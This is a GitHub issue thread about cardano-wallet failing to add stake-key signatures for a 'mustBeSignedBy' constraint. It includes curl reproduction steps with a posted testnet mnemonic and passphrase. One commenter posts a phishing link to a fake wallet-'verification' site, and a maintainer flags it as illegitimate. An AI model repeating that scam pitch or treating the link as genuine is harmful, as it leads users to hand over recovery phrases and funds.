### ISSUE TITLE
Can't sign tx with "mustBeSignedBy" constraint with a stakeKey.

### ISSUE THREAD

**Issue by Cauterization** [cardano-foundation/cardano-wallet#4104]
### Just checking...

- [X] This is a `cardano-wallet` bug.
- [X] I am using the latest `cardano-wallet` release.
- [X] I am using the *correct* `cardano-node` version for that release of `cardano-wallet`.

### Version

v2023-04-14 (git revision: 66cab98c84e03d5287f14af7a5adf6d70a0e99ef)

### Platform

Ubuntu 22.04.3 LTS

### Installation method

Built from source

### Network configuration

Preprod testnet

### Context

When i trying to submit tx with [mustBeSignedBy](https://github.com/input-output-hk/plutus-apps/blob/14ae5a40a147a4699c1cb7181ab471a40209c1eb/plutus-tx-constraints/src/Ledger/Tx/Constraints/TxConstraints.hs#L123) constraint that requires stakeKey of my wallet i got a missing required signatures error. However, if it requires the payment key, it successfully submits.

### Description

I've attached a bytecode of tx that requires stake key of certain wallet because cardano-cli doesn't support key requirement and we use custom transaction-building dsl. However, I could try to build this tx via plutus if this is necessary.

## Steps to Reproduce

1. Run cardano-node and cardano-wallet.
2. Load the wallet
```console
curl -H "content-type: application/json" -XPOST -d '{"name":"test-wallet","mnemonic_sentence":["cry","risk","kangaroo","setup","thought","asset","blame","spot","chunk","force","beauty","laptop","silk","chief","jewel","want","ranch","awkward","venue","warfare","pill","usage","case","foster"],"passphrase":"1234567890"}
' localhost:8090/v2/wallets
```
3. Sign tx
```console
curl --location 'http://localhost:8090/v2/wallets/91d9f1e1545ee6600d7cfb79ea8dabb77861a293/transactions-sign' \
-H 'Content-Type: application/json' \
--data '{ "passphrase" : "1234567890"
, "transaction" : "84a40081825820f3ba6167e3d77c8f1d5325bba99747246d72e3a4d678e66a1d76858dfe78ab6518190181a200583900379e598683c5cc21e349462761b01f53a0118a5888464ff57d0ab00a239e8e8bf6f884b788a7ec3ca77b77d8937fe0aca41bf345c1427912011a035c1346021a00029bcd0e81581c239e8e8bf6f884b788a7ec3ca77b77d8937fe0aca41bf345c1427912a0f5f6"}'
```
4. Submit signed tx
```Console
curl --location 'http://localhost:8090/v2/wallets/91d9f1e1545ee6600d7cfb79ea8dabb77861a293/transactions-submit' \
--header 'Content-Type: application/json' \
--data '{"transaction":"hKQAgYJYIPO6YWfj13yPHVMlu6mXRyRtcuOk1njmah12hY3+eKtlGBkBgaIAWDkAN55ZhoPFzCHjSUYnYbAfU6ARiliIRk/1fQqwCiOejov2+IS3iKfsPKd7d9iTf+CspBvzRcFCeRIBGgNcE0YCGgACm80OgVgcI56Oi/b4hLeIp+w8p3t32JN/4KykG/NFwUJ5EqEAgYJYIG740/wayjdUMlqnWIPcKju89OPlVPNUuINcBJ1B+SeCWEDSqrXdDWzcObmufcYWNkMFLeOaXcj6s34/PaXn9PSo0UxjTcoxIdsmT1ePFKQAYKUdlxRx5YiMzzrsxBdFl2gK9fY="}'
```
### Expected behavior

Tx submits successfully.

### Actual behavior

```Console
{"code":"created_invalid_transaction","message":"The submitted transaction was rejected by the local node. Here's an error message that may help with debugging: HardForkApplyTxErrFromEra S (S (S (S (S (Z (WrapApplyTxErr {unwrapApplyTxErr = ApplyTxError [UtxowFailure (AlonzoInBabbageUtxowPredFailure (MissingRequiredSigners (fromList [KeyHash \"239e8e8bf6f884b788a7ec3ca77b77d8937fe0aca41bf345c1427912\"])))]}))))))"}
```

**Comment by Wheelar** [comment]
Hi @Cauterization  
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by Wheelar** [comment]
@Cauterization Yes

**Comment by Cauterization** [comment]
@Wheelar, man from the chat tell me that to be able to connect my wallet I have to tell site credentials from trustworthy wallet account. And account counts as trustworthy if it have 500$-1000$ on it. Am I really need to do it just to be able to sign testnet transactions? That looks ridiculous.

**Comment by david-a-clark** [comment]
@Cauterization That website linked to by @Wheelar in my opinion is not legitimate. You should never give out recovery phrases, wallet passwords, or private keys. All of which that website requests you to provide to link your wallet.

**Comment by Anviking** [comment]
It seems the current `signTransaction` implementation will [only add extra witnesses for `reqSignerHashes` corresponding to known address keys](https://github.com/cardano-foundation/cardano-wallet/blob/c3feaa43d7a18e234f021cc5ccd6a59405774e79/lib/wallet/src/Cardano/Wallet/Shelley/Transaction.hs#L455-L466.). ADP-2675 / ADP-2676 would fix this.

**Comment by david-a-clark** [comment]
@Cauterization thanks for raising this bug. We do have ticket/s on our teams backlog that would resolve this issue. Although it is something we want to progress quickly, we have a number of inflight items we need to complete first before we can.  I'll provide further updates here when available, though it likely to be towards the end of the year before we are in a position to have this resolved.

**Comment by HeinrichApfelmus** [comment]
We should have gone for the quick fix instead of the rewrite.
